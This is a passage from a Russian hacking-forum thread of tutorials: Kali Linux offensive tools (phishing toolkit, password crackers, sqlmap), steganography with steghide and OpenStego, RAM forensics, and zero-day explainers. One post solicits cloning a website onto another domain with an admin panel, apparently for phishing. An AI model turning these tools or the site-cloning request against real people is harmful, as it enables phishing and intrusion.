Шаг 6: Теперь введите следующие команды, чтобы вставить наш файл в изображение с паролем:
https://i.gyazo.com/b5b2464b80ee89770f169cb918f42856.jpg
Шаг 7: Steghide запросит у вас кодовую фразу/пароль. Таким образом, вы можете ввести любой пароль, который вам нравится, а затем повторно ввести ту же фразу-пароль для подтверждения, нажав Enter.
Вы получите следующий вывод на своем терминале:
https://i.gyazo.com/81e9c2e48b7caa49c9082b073527bbf4.jpg
Шаг 8: Готово! Вы успешно спрятали файл в изображении.
Как расшифровать файл с помощью Kali Linux:
Шаг 1: Чтобы расшифровать файл, перейдите в свой терминал Kali Linux и введите следующую команду:
steghide extract -sf girl.jpg
https://i.gyazo.com/3f0f56918adbb05a0de6a934afa6c89b.jpg
Шаг 2: Теперь введите пароль/кодовую фразу, чтобы посмотреть файл. Вам нужен правильный пароль, иначе файл не откроется.
Поздравляем, вы изучили основы стеганографии и использования steghide в Kali Linux. Теперь вы можете скрыть файлы в изображениях и даже в аудиофайлах (принцип тот же), используя steghide.
BlackMAST
30.01.2023, 16:46
https://i.gyazo.com/43173eeeaa6f03c5b8fac272b23ed937.jpg
Вступить в наш чат
Ищете инструменты, которые смогли бы автоматизировать и облегчить вашу работу? Вы попали точно по адресу, сегодня мы расскажем вам о топовых инструментах, которые способны значительно сэкономить время и порадовать своей эффективностью. Речь пойдет об инструментах, которые предустановлены вместе с Kali Linux. В Kali Linux включено более 500 инструментов, которые могут использоваться для взлома и тестирования на проникновение. Разбегаются глаза от всего этого многообразия? Остановитесь, ведь мы собрали для вас только лучшие из лучших.
Готовы? Тогда поехали!
https://i.gyazo.com/73258d4afead7185e017d659df36c10d.jpg
1. Burp Suite
Burp Suite — один из наиболее широко используемых инструментов тестирования безопасности веб-приложений.
Этот инструмент используется в качестве прокси, что означает, что все запросы от браузера прокси будут проходить через него. Поскольку запросы выполняются через Burp Suite, мы можем вносить изменения в запросы по мере необходимости. И эта функция делает этот инструмент полезным для тестирования уязвимостей, таких как XSS, SQLI и других проблем, связанных с Интернетом.
Существует бесплатная версия, которая поставляется с предустановленной Kali Linux, но есть также и премиум-версия под названием Burp Suite Professional, которая имеет гораздо больше функций.
Как использовать Burp Suite?
Чтобы использовать Burp Suite, выполните следующие действия:
Загрузите ПК с Kali Linux.
Откройте терминал.
Введите там следующее, чтобы запустить «Burp Suite»: burpsuite
https://i.gyazo.com/8dc65dfa75bfb6956d9a4613447c4d7b.png
2. Nmap
Nmap, также известный как Network Mapper, — очень простой инструмент сканирования с открытым исходным кодом в Kali Linux. Этот инструмент позволяет нам сканировать систему или сеть; сначала он отправляет пакеты на компьютер хоста, а затем анализирует ответ, чтобы получить желаемый результат.
Инструмент Nmap — один из лучших и наиболее широко используемых инструментов для сканирования и тестирования на проникновение.
Как использовать NMAP?
Чтобы использовать NMAP, выполните следующие действия:
Загрузите ПК с Kali Linux.
Откройте терминал.
Введите следующее, чтобы запустить «NMAP»: nmap
Подробнее об этом инструменте читайте в нашей авторской статье по ссылке (https://forum.antichat.xyz/threads/750994/post-332197).
https://i.gyazo.com/0689ff3d79a72dbd180f6cd51e6b4e3d.png
3. Wireshark
Wireshark — один из самых известный инструментов Kali Linux. Его еще обычно называют «сниффером сети»; подразумевается, что он перехватывает и анализирует пакеты. Этот инструмент используется для сетевого анализа, который необходим для безопасности. Он способен анализировать данные, отправляемые по сети в виде пакетов. Каждый пакет имеет подробную информацию, которая включает в себя источник, IP-адрес, время передачи, тип используемого протокола и другие данные. Эти файлы имеют расширение «pcapp», которые могут быть проанализированы только Wireshark.
Как использовать Wireshark?
Чтобы запустить и использовать Wireshark, сделайте следующее:
Загрузите ПК с Kali Linux.
Откройте терминал.
Введите эту команду, чтобы запустить «Wireshark»: wireshark
Загрузите демонстрационный файл «pcapp».
Затем нажмите «Ctrl + 0», чтобы открыть файл «pcapp» в wireshark.
После чего, вы найдете список пакетов и их содержимое.
https://i.gyazo.com/a932ef907964154d1a5bd6dd1301e4b7.png
4. Aircrack NG
Это универсальный анализатор пакетов, взломщик WEP и WPA и инструмент захвата хэша. Aircrack чаще всего используется для взлома Wi-Fi, но на этом его возможности не заканчиваются: вы можете использовать его для захвата пакетов, а также взламывать хэши с помощью различных атак, например, таких как атаки по словарю. Он поддерживает практически все современные беспроводные интерфейсы.
Как использовать Aircrack NG?
Чтобы использовать этот инструмент, выполните следующие действия:
Загрузите машину с Kali Linux.
Откройте терминал.
Введите следующее: aircrack-ng
https://i.gyazo.com/1705e977444beda21ccdb7f6121e0f21.png
5. SET
SET, или Social Engineering Toolkit, представляет собой среду тестирования на проникновение с открытым исходным кодом, предназначенную для социальной инженерии. Он имеет набор инструментов, которые можно использовать для сбора информации о жертве, эксплуатируя и манипулируя человеческой природой. Это также один из лучших инструментов для проведения фишинговых атак.
Как использовать инструмент социальной инженерии?
Чтобы использовать SET, выполните следующие действия:
Загрузите свой ПК с Kali Linux, SET уже предустановлен.
Откройте терминал.
Введите: sudo settoolkit
Вы увидите набор опций, которые вы можете использовать для выполнения своих атак.
https://i.gyazo.com/47e8b331a93efb2b8441d9d8aee1f31d.png
BlackMAST
02.02.2023, 17:50
https://i.gyazo.com/2851cc0e7c7996e99a02386e7e2f1996.jpg
Вступить в наш чат
Ищете инструменты, которые смогли бы автоматизировать и облегчить вашу работу? Вы попали точно по адресу, сегодня мы расскажем вам о топовых инструментах, которые способны значительно сэкономить время и порадовать своей эффективностью. Речь пойдет об инструментах, которые предустановлены вместе с Kali Linux. В Kali Linux включено более 500 инструментов, которые могут использоваться для взлома и тестирования на проникновение. Разбегаются глаза от всего этого многообразия? Остановитесь, ведь мы собрали для вас только лучшие из лучших.
Готовы? Тогда поехали!
1. Metasploit
Metasploit — это инструмент с открытым исходным кодом, который является одним из наиболее широко используемых инструментов для тестирования на проникновение во всем мире. В основном, Metasploit - это инструмент командной строки, но он также включает в себя пакет с графическим интерфейсом, известный как «Armitage», что делает его использование более удобным и продуктивным. Этот инструмент содержит большое количество эксплойтов для тестирования уязвимостей сети или операционной системы.
Как использовать Metasploit?
1. Загрузите ПК с Kali Linux.
2. Откройте терминал.
3. Для запуска «Metasploit» введите: msfconsole
https://i.gyazo.com/e492031326a93b46709e0cab4e4bd79d.jpg
2. Netcat
Netcat, также известный как NC, представляет собой сетевой инструмент, который выполняет сканирование портов, передачу файлов и получает данные о хосте. Netcat использует порты TCP или UDP. Также его называют «швейцарским ножом хакера», поэтому его всегда стоит иметь под рукой.
Как использовать Netcat?
1. Загрузите ПК с Kali Linux.
2. Откройте терминал.
3. Введите: sudo nc или sudo netcat
https://i.gyazo.com/2d7c2bf9a45f1b12def266c0101b2c2b.jpg
3. *****
***** поддерживает огромное количество служб, благодаря своей быстроте и надёжности этот инструмент заслуживает вашего внимания. ***** подбирает пароли методом брутфорса к более чем 30 протоколам, включая telnet, ftp, http, https, smb и т.д.
Как использовать Гидру?
1. Загрузите ПК с Kali Linux.
2. Откройте терминал.
3. Введите: sudo *****
https://i.gyazo.com/62677847658287c454fc24406c34fdbd.jpg
4. John The Ripper
John The Ripper или Джон Потрошитель — это инструмент с открытым исходным кодом, используемый для взлома паролей во время тестирования на проникновение. JTR (John The Ripper) доступен не только для Linux, но и для различных других операционных систем.
Его основным предназначением является аудит слабых паролей методом перебора. Он имеет свои собственные словари возможных паролей, доступные на 20 языках. Эти словари предоставляют большое количество возможных паролей, из которых можно создать хеш-значения, чтобы угадать целевой пароль. Поскольку использование одного и того же пароля на большинстве сайтов стало тенденцией, взлом одного пароля чаще всего становится ключом от всех дверей. Этот инструмент сначала шифрует данные, а затем проверяет совпадение хеш-значений; если проверка закончится успешно - у вас есть пароль; если нет, то проверка будет продолжена.
Как использовать Джона Потрошителя?
1. Загрузите ПК с Kali Linux.
2. Откройте терминал.
3. Введите: sudo john.
https://i.gyazo.com/7b30855fd76f235023206d6faf9fcf68.jpg
5. SQL Map
SQL Map — это инструмент с открытым исходным кодом, используемый при тестировании на проникновение для обнаружения и использования бреши «SQL Injection». Эти атаки могут получить контроль над базой данных, использующей SQL, и они могут повлиять на любое веб-приложение или веб-сайт, к которому подключена база данных SQL.
Базы данных SQL включают mySQL, SQL Server, Oracle и многие другие, и они содержат конфиденциальную информацию, которая в случае утечки повлияет на многих пользователей. Поэтому для поиска и защиты от этих уязвимостей как нельзя более кстати приходится SQLMap.
Как использовать SQLMap:
1. Загрузите ПК с Kali Linux.
2. Откройте терминал.
3. Введите: sudo sqlmap
https://i.gyazo.com/95bdcb10b78b9bdf987b44243d3976c5.jpg
Заключение:
Если вы хотите стать экспертом по кибербезопасности, вы должны хорошо знать Kali Linux и его инструменты. Знание и умение пользоваться инструментами поможет вам в решение многих задач, будь то сбор информации, тестирование на проникновение, фишинг, взлом или что-то еще.
Это лишь неполный список инструментов, необходимых для того, чтобы лучше освоить Kali Linux. Мы надеемся, что вы узнали из этой темы об инструментах, о которых раньше не догадывались. На этом все. Удачи!
Kremlin_Gremlin
03.02.2023, 00:54
Заказ - копирование сайта и настройка на свой домен с подключением панели админа.
BlackMAST
06.02.2023, 20:45
https://i.gyazo.com/64605bf91d40c7e0599a5052aa0bf261.jpg
Вступить в наш чат
Достаточно ли эффективна система безопасности Windows, чтобы защитить вас от вредоносных программ и вирусов? Чтобы ответить на этот вопрос, давайте изучим «Безопасность Windows» и посмотрим, что она делает.
Итак, давайте начнем.
https://i.gyazo.com/9f64c5796d91aade3fc2e92892369dc6.jpg
Безопасность Windows
Если раньше большинство пользователей скептически относились ко встроенной защите Windows, то сейчас же их мнение изменилось.
За последнее время многие технические обозреватели дали Windows Безопасности положительную оценку за быстрое обнаружение и остановку вирусов и вредоносных программ, более того некоторые даже оценивают ее выше, чем платные антивирусные программы.
https://i.gyazo.com/339558663299c2777c8e31a5e5bd99ec.jpg
Как же Windows удается добиться такой высокой защиты? Все дело в двух подходах, которые она задействует.
Во-первых, Windows проверяет подписи в базе данных. Microsoft несколько раз в день публикует обновления для ПК с сигнатурами вирусов, после чего служба безопасности Windows загружает эти сигнатуры и сравнивает их с возможными угрозами.
Второй подход — использование «эвристики». Это означает, что Windows анализирует поведение программы без использования конкретных определений или сигнатур. Таким образом, если уязвимость нулевого дня или необнаруженная угроза проникнет в вашу систему Windows, то Безопасность Windows скорее всего заблокирует её, даже если ранее она никогда не была замечена.
https://i.gyazo.com/eb5b8f3d9145c4274cbd37d6aadea5a8.png
Результаты сравнительного теста AV
Уязвимости Безопасности Windows
Безопасность Windows довольно эффективна для обычных пользователей, но все же имеет некоторые уязвимости. Например, она довольно сильно зависит от возможности подключения к серверам Microsoft и доступа к данным о вредоносном ПО, хранящимся в облаке. Недавний сравнительный тест AV показал, что Безопасность Windows обнаружила только 2/3 угроз при потере подключения к Интернету, что отстает от большинства платных конкурентов, которые хранят большую часть своих ресурсов локально.
Конечно, вы сейчас скажете, что мы все время проводим онлайн, но вы только представьте ситуацию, что вы по незнанию загрузили вредоносное ПО, а затем оно решило действовать именно в тот момент, когда вы не были подключены к сети, потому что забыли заплатить за Интернет или у вас отключили электричество.
Кроме того, популярные платные антивирусы предоставляют вам дополнительные функции, такие как VPN или мониторинг вашей домашней сети на наличие уязвимостей, чем Windows, к сожалению, не может похвастаться.
Безопасность конечных точек
Конечные точки — это устройства, которые подключаются к вашей сети и обмениваются с нею данными. Например, это могут телефоны, наушники, колонки и т.д. Когда устройство (например, ноутбук) подключается к сети, поток информации между ними во многом напоминает разговор между двумя собеседниками по телефону.
Киберпреступники выбирают конечные точки для атак, поскольку они позволяют получить доступ к основному устройству и являются более уязвимыми по своей природе. Именно по этим причинам безопасность конечных точек крайне важна.
В наши дни безопасность конечных точек обеспечивается растущим числом компаний, таких как «CrowdStrike», «HP Wolf Security», «Central 1», «FireEye» и даже «Microsoft».
Но при этом защита должна включать в себя не только обычные функции антивируса от вредоносных программ, но и расширенные функции:
автоматическое восстановление BIOS системы в случае атаки;
более тщательное изучение файлов для обнаружения вредоносного кода;
изолированность процессов в памяти, чтобы вредоносное ПО не могло распространиться на другие части системы;
поддержание работы программного обеспечения безопасности с аппаратным контролем, даже если операционная система скомпрометирована.
Заключение
Безопасность Windows совершенствуется и развивается на глазах. Еще недавно никто и подумать не мог, что Microsoft встанет в одном ряду с популярными антивирусными программами по уровню защиты и безопасности. Если вы являетесь обычным пользователем ПК, память которого не заполнена жизненно важными файлами, которые нельзя скомпрометировать любой ценой, то продолжайте, как и раньше, использовать Windows. Но даже несмотря на хорошую защиты, все же не стоит пренебрегать антивирусом, который лишь усилит сохранность и безопасность вашей системы.
BlackMAST
10.02.2023, 01:09
https://i.gyazo.com/ce03a7087d09e93c7acdbc56543a48dd.jpg
Вступить в наш чат
Вы когда-нибудь задумывались, что может случиться, если ваш компьютер попадает в чужие руки? А вы знали, что даже выключенный ПК может рассказать много неожиданных вещей, как о себе, так и о его владельце? Все дело в оперативной памяти, которая некоторое время хранит информацию.
Наряду с ростом кибератак повышается необходимость быстро находить и устранять угрозу. В этой деле поможет криминалистика оперативной памяти. Если ваш компьютер подвергся взлому, а вы даже об этом не догадывались — анализ памяти это покажет.
В этой статье мы расскажем:
Что такое криминалистика оперативной памяти?
Важна ли криминалистика RAM?
Как создать дамп памяти системы.
Что такое Volatility?
Как использовать Volatility.
Итак, поехали.
https://i.gyazo.com/e5963915a39cb98a17ed4211aafe6eab.jpg
Криминалистика оперативной памяти
Криминалистика оперативной памяти — это процесс анализа содержимого энергозависимой памяти (ОЗУ) компьютера с целью выявления последней активности и любых вредоносных вторжений. Энергозависимая память временно хранит данные, поэтому она может предоставить ценную информацию о том, что происходило на компьютере в последнее время. Вы, возможно, удивитесь, но в ней какое-то время хранится очень много всего интересного: сообщения; комментарии, оставленные на форумах; информация о последних скаченных файлах; картинки; страницы веб-сайтов; ключи, с помощью которых можно расшифровать содержимое криптоконтейнеров и многое другое. А если ваш ПК был заражен вирусом или подвергся взлому, то это тоже станет известно с помощью криминалистического анализа оперативной памяти.
https://i.gyazo.com/5ce76be21d2388495bc17c7bbe28c26f.jpg
Важна ли криминалистика RAM
На этот вопрос есть простой ответ: да!
Криминалистика оперативной памяти очень важна, поскольку она позволяет обнаруживать и предотвращать кибератаки в режиме реального времени. В отличие от традиционных методов судебной экспертизы, которые анализируют данные, уже записанные на диск, криминалистика RAM анализирует только те данные, которые используются в данный момент.
Это означает, что вы можете быстро и эффективно находить любые вредоносные программы и вирусы и предпринимать необходимые шаги для предотвращения дальнейшего ущерба.
Как создать дамп памяти системы
Для того, чтобы начать работу с оперативной памятью, нам нужно создать дамп памяти компьютера. Для этого мы будем использовать инструмент под названием «DumpIt».
https://i.gyazo.com/f67c075f018d74b20d8c518ee7643840.png
Когда мы говорим «память», то имеем в виду оперативную или энергозависимую память, в которой хранятся все запущенные в данный момент процессы или программы. Основная идея заключается в том, что если в системе есть какие-либо вирусы или вредоносные программы, то они обязательно себя покажут.
Скачайте и запустите программу, после запуска «DumpIt» запросит подтверждение на получение доступа ко всем данным, которые в настоящее время работают на вашем ПК, и затем сохранит их в виде файла.
Кроме того, следует упомянуть еще один инструмент — «FTK Imager», бесплатный криминалистический инструмент. Он также позволяет анализировать память.
Поэтому, если по какой-либо причине «DumpIt» не дает вам нужного результата или вы столкнулись с некоторыми ошибками, вы можете использовать один из этих инструментов: диспетчер задач Windows, инструмент SysInternals, RAM Capture и FTK Imager.
https://i.gyazo.com/6a69a3de4a3537cb662a2ec8395cc1de.jpg
FTK Imager
Что такое Volatility
https://i.gyazo.com/75dc2e0176e73338c259397476ebea97.png
Volatility — это платформа с открытым исходным кодом, которую можно использовать для проведения криминалистической экспертизы оперативной памяти на компьютере. Это отличный инструмент для анализа дампов памяти, который поможет вам определить, был ли взломан ваш компьютер.
Как использовать Volatility
Теперь, когда файл выгружен мы можем начинать анализ с помощью инструмента с открытым исходным кодом Volatility:
Загрузите и установите последнюю версию Volatility с официального сайта.
Определите профиль. Чтобы правильно определить профиль для анализируемого дампа памяти, запустите команду «imageinfo».
Проанализируйте дамп памяти. После того, как вы определили профиль, вы можете начать анализ дампа памяти, используя различные плагины, предоставляемые Volatility. Некоторые распространенные плагины включают pslist, psscan и netscan, которые предоставляют информацию о запущенных процессах, сетевых подключениях и другую системную информацию.
Изучите результаты. Программа выдаст вам результаты анализа, которые скажут, был ли ваш компьютер взломан или нет.
Заключение
Компьютерная криминалистика — мощный инструмент для обнаружения и предотвращения кибератак. Используя Volatility для проведения криминалистического анализа оперативной памяти на вашем ПК, вы можете быстро и эффективно обнаружить любые признаки вредоносной активности и предпринять необходимые шаги для предотвращения дальнейшего ущерба. Таким образом, если вы подозреваете, что ваш компьютер был взломан, проведите криминалистический анализ, чтобы предотвратить кибер-угрозы.
BlackMAST
15.02.2023, 10:05
https://i.gyazo.com/165fbd4311430e1a26e47908167c12ba.jpg
Вступить в наш чат
Еще с древних времен люди задавались вопросом, как зашифровать послание и утаить его от посторонних глаз. С тех пор методы и способы защиты изменились, но суть осталась неизменной. Когда речь заходит о надежной защите файлов и информации, то в дело вступает стеганография. С помощью нее вы можете спрятать свои конфиденциальные файлы в аудио- и видеозаписях или изображениях.
В этой статье вы узнаете:
Что такое стеганография?
Зачем использовать стеганографию?
Как использовать стеганографию?
Как скрыть секретную информацию в изображении?
Как скрыть секретную информацию в аудиофайле?
https://i.gyazo.com/00bd77b40ef3d9aadbdc86391fd467b5.jpg
Что такое стеганография
Слово «стеганография» происходит от греческих слов steganos (секрет, тайна) и graphy (запись) и дословно переводится как «тайнопись».
Стеганография — это метод сокрытия секретных данных в другом файле, таком как изображение, аудио- или видеозапись.
Цель стеганографии — спрятать конфиденциальную информацию и, таким образом, защитить её от третьих лиц.
В отличие от шифрования, которое лишь защищает файлы с помощью ключа, стеганография скрывает сам факт их существования.
Зачем использовать стеганографию?
Причин для использования стеганографии очень много, но основная — это маскировка личных данных и защита конфиденциальной информации.
Стеганография подразумевает хранение секретных файлов на видном месте. Люди маскируют важные данные под, казалось бы, обычный файл, такой как фотография или аудиозапись, чтобы сделать их незаметными для других. Скрывая данные в другом файле, стеганография обеспечивает дополнительный уровень безопасности.
Стеганографию также можно использовать для обхода брандмауэров и других мер безопасности, которые могут блокировать или ограничивать передачу определенных типов файлов.
Как использовать стеганографию?
Чтобы использовать стеганографию, в первую очередь нам понадобится любой файл-обманка, такой как изображение или аудиозапись и программа для стеганографии.
После чего мы закодируем наши секретные данные в файл-обманку, что приведет к созданию нового файла, содержащего исходный файл и наши скрытые данные. Теперь, если мы хотим получить доступ к секретным данным, мы просто используем программу стеганографии для декодирования файла, где вводим пароль, который установили в процессе кодирования. Если пароль совпадет, то секретные данные будут извлечены и доступны для вас.
Как скрыть секретную информацию в изображении?
Существует несколько инструментов для сокрытия секретной информации в изображениях с помощью стеганографии. Вот несколько популярных инструментов, которые помогут вам в этом:
OpenStego:
Это бесплатный инструмент стеганографии с открытым исходным кодом, который поддерживает широкий спектр форматов изображений и аудио.
QuickStego:
Удобный инструмент стеганографии, который позволяет скрывать текст или файл внутри изображения.
SteganoGraph:
Он поддерживает несколько форматов файлов изображений и включает в себя такие функции, как шифрование и защита паролем.
F5 Steganography:
Инструмент использует специальную комбинацию для защиты, чтобы данные были хорошо скрыты и поддерживает различные форматы изображений.
Steg:
Инструмент стеганографии на основе командной строки, где вы также можете найти большое количество доступных форматов файла.
Вы можете выбрать для себя любой из этих инструментов, но мы же покажем, как работает стеганография на примере «OpenStego версии-0.8.6».
https://i.gyazo.com/b986e8dcc8701e02132989671665f38a.png
Итак, чтобы скрыть секретную информацию в изображении с помощью «OpenStego», выполните следующие действия:
Скачайте файл изображения, который будет служить обложкой для нашего секретного файла. Во втором поле вставьте путь к файлу обложки;
Затем скопируйте путь к секретному файлу и вставьте его в первое поле;
В третьем поле от вас требуется указать место, где вы сохраните зашифрованный файл;
Выберите алгоритм шифрования или оставьте исходный AES128;
Придумайте и запомните пароль, которые вы будете вводить каждый раз, чтобы получить доступ к секретному файлу.
Извлечение данных
https://i.gyazo.com/f97ef9ab9a0c1fe26d2e236744ad4d74.png
Извлечение данных не составит трудностей; вам просто нужно запомнить путь к изображению, в котором вы скрыли ваши данные.
После чего выберите папку, в которую вы хотите извлечь скрытые файлы, и вставьте путь во второе поле. Наконец, вы должны ввести пароль, который вы использовали для скрытия данных и нажать «Извлечь данные». Вы закончили извлечение скрытых файлов из картинки.
Как скрыть секретную информацию в аудиофайле?
Вы можете использовать различные инструменты, чтобы скрыть секретную информацию в аудиофайле. Сейчас мы расскажем вам о лучших из них:
OpenStego:
Это бесплатный инструмент с открытым исходным кодом, который поддерживает несколько форматов аудиофайлов и предоставляет удобный интерфейс для сокрытия и извлечения секретной информации. Его же мы использовали и для сокрытия информации в изображении.
Audio Steganography:
Бесплатный инструмент для стеганографии аудио, который можно использовать для сокрытия секретной информации в аудиофайлах WAV.
MP3Stego:
Это бесплатный инструмент, который можно использовать для сокрытия секретной информации в аудиофайлах MP3.
DeepSound:
Хотя этот инструмент является платным, он имеет ряд расширенных возможностей для засекречивания вашей личной информации.
Выбирайте любой инструмент на свое усмотрение, а мы же будем использовать «DeepSound2.0».
https://i.gyazo.com/0673a5b83c5f0fc7848d93e6bef136ba.jpg
Выполните следующие шаги, если вы используете «DeepSound2.0», если же у вас другой инструмент, то все равно ознакомьтесь с пунктами, написанными ниже, так как последовательность их выполнения зачастую совпадает.
Вам понадобится аудиофайл, который будет служить прикрытием для вашего секретного файла. Для этого выберите аудио с помощью кнопки «Open carrier files».
Затем нажмите кнопку «Add secret files» и добавьте свои секретные файлы.
Далее ищем кнопку с надписью «Encode secret files» и нажимаем ее. После этого появится окно, одетая сможете выбрать желаемый формат аудио или же оставить как есть.
Обязательно добавьте пароль; для этого вам нужно поставить галочку рядом с «Encrypt secret files (AES 256)».
Затем введите свои пароли нажмите кнопку «Encode secret files».
Теперь вы успешно закодировали свои секретные файлы внутри выбранного аудио.
https://i.gyazo.com/2eb59f83e6e4fa899ea0c29a8ab075b2.png
Извлечение данных
Для извлечения данных вам потребуется выбрать зашифрованный аудиофайл, нажав кнопку «Open carrier files». Как только вы откроете зашифрованный файл, он запросит пароль.
https://i.gyazo.com/4a731e8d58e8da9c99880f1fb5e6a395.png
После того, как вы введете правильный пароль, вы увидите кнопку «Extract secret files», нажмите на неё.
Поздравляем, вы научились прятать и извлекать свои секретные файлы из картинки и аудиофайла!
Заключение
Стеганография — мощный инструмент для сокрытия секретных файлов и защиты конфиденциальной информации.
Используя файл-обманку и специальный инструмент для стеганографии, вы можете кодировать свои секретные данные и хранить их на видном месте, не вызывая никаких подозрений. Независимо от того, хотите ли вы защитить личные данные от взора близких, бизнес отчеты или финансовые данные, стеганография поможет сохранить вашу информацию в безопасности.
BlackMAST
16.02.2023, 19:36
https://i.gyazo.com/00a4a26818dc986ab7a6f7c7124926cb.jpg
Вступить в наш чат
Эксплойт нулевого дня, угроза нулевого дня, 0-day уязвимость — все чаще стали звучать в мире кибербезопасности. Но что это такое и какую опасность представляет для пользователей и компаний? В этой статье мы исследуем эти вопросы и обо всем вам расскажем.
Готовы? Тогда начинаем!
https://i.gyazo.com/59e0ece05f8fa2c21859e3e9e6029525.jpg
Что такое уязвимость нулевого дня?
Эксплойт нулевого дня — это ранее неизвестная кибератака в программном обеспечении, для которой ещё не было выпущено официальное исправление. Термин «нулевой день» отражает тот факт, что у поставщика не было времени на устранение уязвимости с момента ее обнаружения.
После обнаружения злоумышленники могут использовать уязвимость для запуска вредоносных атак как на организации, так и на отдельных пользователей, что часто приводит к краже данных, несанкционированному доступу и другим серьезным нарушениям безопасности.
https://i.gyazo.com/46463cfb8980a4a22fa35565a538b769.png
Статистика по атакам нулевого дня с 2012 г. по 2021 г.
Как находят уязвимости нулевого дня?
Исследователи кибербезопасности и хакеры часто обнаруживают эти эксплойты, когда ищут уязвимости в ПО и ОС. В одних случаях обнаружение уязвимостей такого рода является совершенно случайным, в других — это результат долгого и целенаправленного поиска.
После их обнаружения, в даркнете начинают появляться объявления о продаже этих эксплойтов, давая злоумышленникам возможность начать атаки.
Как работает 0-day угроза?
Угрозы нулевого дня работают, используя уязвимость в программном обеспечении или операционной системе. Например, такой эксплойт может использовать уязвимость в коде, позволяющую злоумышленнику обойти меры безопасности и получить доступ к конфиденциальной информации.
Помимо этого, 0-day угроза дает хакеру возможность установить вредоносное ПО и даже получить полный контроль над системой.
Как злоумышленники используют эксплойты нулевого дня?
Злоумышленники могут использовать недавно обнаруженную угрозу нулевого дня различными способами:
Для проведения атак на определенные компании или отдельные лица (правительство, финансовые учреждения, крупные корпорации). В этих случаях цель злоумышленника часто состоит в том, чтобы украсть конфиденциальную информацию, нарушить работу и нанести ущерб организации.
Крупномасштабные атаки, такие как программы-вымогатели, утечки данных. В этих случаях злоумышленник может использовать уязвимость для получения доступа к персональным данным и кражи конфиденциальной информации у большого количества жертв.
Как защититься от угрозы?
Лучший способ обезопасить себя от подобных угроз — своевременно обновлять программное обеспечение и операционную систему.
Снижение риска атаки требует оперативного исправления уязвимостей сразу после их обнаружения. Кроме того, использование надежных паролей, антивируса и включение двухфакторной аутентификации также может помочь защититься от эксплойтов и других угроз безопасности.
Stuxnet-атака
Stuxnet - одна из самых сложных и изощренных кибератак, которая была нацелена на иранскую ядерную программу в 2010 году. Атака использовала эксплойт нулевого дня в операционной системе Windows для распространения вредоносного ПО от одного компьютера к другому, в конечном итоге достигнув систем, которые управляли центрифугами, используемыми в ядерной программе Ирана.
https://i.gyazo.com/16869197f23d3559fd06ae40c7ff097a.png
Вредоносная программа привела к тому, что центрифуги вышли из-под контроля и практически были уничтожены.
Атака Stuxnet — это яркая иллюстрация последствий, которые связаны с эксплойтами нулевого дня. Воспользовавшись ранее не обнаруженной уязвимостью, хакеры смогли провести целенаправленную и успешную атаку, продемонстрировав потенциальную угрозу атак нулевого дня.
WannaCry-атака
Еще один громкий случай, связанный с уязвимостью нулевого дня произошел в мае 2017 года. Хакерская группа Shadow Brokers поделились информацией об угрозе нулевого дня в Microsoft Windows, известной как EternalBlue, разработанной Агентством национальной безопасности США. Затем злоумышленники WannaCry использовали этот эксплойт, что привело к быстрому распространению атаки программы-вымогателя и заражению сотен тысяч систем в более чем 150 странах.
Атака WannaCry оказала значительное влияние на отдельных лиц и организации по всему миру. В результате многие предприятия были вынуждены приостановить работу и понести значительные финансовые потери. Помимо всего прочего, атака также затронула организации здравоохранения, вызвав перебои в работе медицинских учреждений, подвергнув пациентов опасности.
Атака WannaCry стала тревожным звонком для многих организаций, подчеркнув важность сохранения бдительности в отношении угроз нулевого дня и принятия мер для дальнейшей защиты.
Операция Аврора
В 2009 и 2010 годах была осуществлена еще одна сложнейшая кибератака под названием Операция Аврора, нацеленная на ряд высокотехнологичных компаний, включая Google.
Атака, которая, как многие считают, исходила из Китая и спонсировалась государством, вызвала широкую обеспокоенность среди общественности. Операция Аврора оказала значительное влияние на целевые организации, особенно в сфере высоких технологий. Многие компании понесли финансовые убытки в результате кражи конфиденциальной информации и интеллектуальной собственности.
После атаки в рамках операции «Аврора» пострадавшие организации приняли меры по усилению мер кибербезопасности. Они укрепили свои системы кибербезопасности для предотвращения подобных атак в будущем.
Заключение
Таким образом, можно сделать вывод о том, что уязвимость нулевого дня представляет значительную угрозу как организациям, так и отдельным лицам. Крайне важно понимать, как устроена угроза и какой вред она несет. Инциденты, связанные с уязвимостями, подчеркивают необходимость принятия строгих мер безопасности для защиты от угроз, создаваемых эксплойтами нулевого дня. Регулярно обновляя свое программное обеспечение и принимая другие меры безопасности, вы можете снизить риск атаки нулевого дня и защитить свои данные.
BlackMAST
20.02.2023, 21:46
https://i.gyazo.com/9258d64ecd81cbd7468e8aa1797e9d6b.jpg
Вступить в наш чат
В последние годы технология блокчейн стала модным словом, но многие люди до сих пор не понимают, что это такое и как оно работает. В этой статье мы рассмотрим основы блокчейна и то, как он изменил мир финансов, управление цепочками поставок и многое другое.
https://i.gyazo.com/421ff4be7e620f663fe957355fee6d41.jpg
Что такое Блокчейн?
Блокчейн — это децентрализованная цифровая база данных информации, которая регистрирует и хранит все совершенные транзакции. При этом данные поступают блоками, которые объедены в цепочку, что делает их неизменяемыми. Неизменяемый реестр означает, что после того, как транзакция была записана, ее нельзя изменить или удалить. Блокчейн применяется для постоянного и безопасного хранения и передачи всех транзакций в сети.
Как работает блокчейн?
Он записывает транзакции в блоки, связывая их вместе, чтобы сформировать цепочку. Каждый блок содержит уникальный код, называемый хешем, который связывает его с предыдущим блоком. Это создает безопасную и бесконечную запись всех сделок в сети.
Чтобы совершить транзакцию в блокчейне, пользователь должен сначала создать цифровую подпись — это уникальный код, который идентифицирует пользователя и авторизует транзакцию. Проверка и добавление транзакции в следующий блок в цепочке происходит после ее трансляции в сеть. Добавление транзакции в цепочку делает ее постоянной и видимой для всех в сети.
Применение блокчейна
Считается, что возможности Блокчейн ограничиваются лишь передачей криптовалюты, однако, это неправда. Блокчейн имеет широкий спектр применений, в том числе:
Управление цепочками поставок: использование блокчейна отслеживает движение товаров и материалов по цепочке поставок, обеспечивая прозрачность и контроль.
Здравоохранение: блокчейн создает безопасное хранение и управление медицинскими записями пациентов, тем самым улучшая конфиденциальность и сохранность данных.
Финансы: с помощью блокчейна может улучшить финансовые транзакции, сделав их быстрее, безопаснее и дешевле.
Влияние Блокчейна на финансы и цепочку поставок
1. Децентрализация. Децентрализованный характер технологии блокчейна является одной из ее важнейших особенностей. В отличие от традиционных систем, которые полагаются на центральный орган, он работает в децентрализованной и распределенной сети компьютеров, эффективно устраняя необходимость в посредниках и тем самым делая транзакции более безопасными и прозрачными.
2. Распределенный реестр. Копии реестра хранятся на нескольких компьютерах в сети, что практически исключает взлом, поскольку это потребовало бы изменения реестра на каждом компьютере в сети.
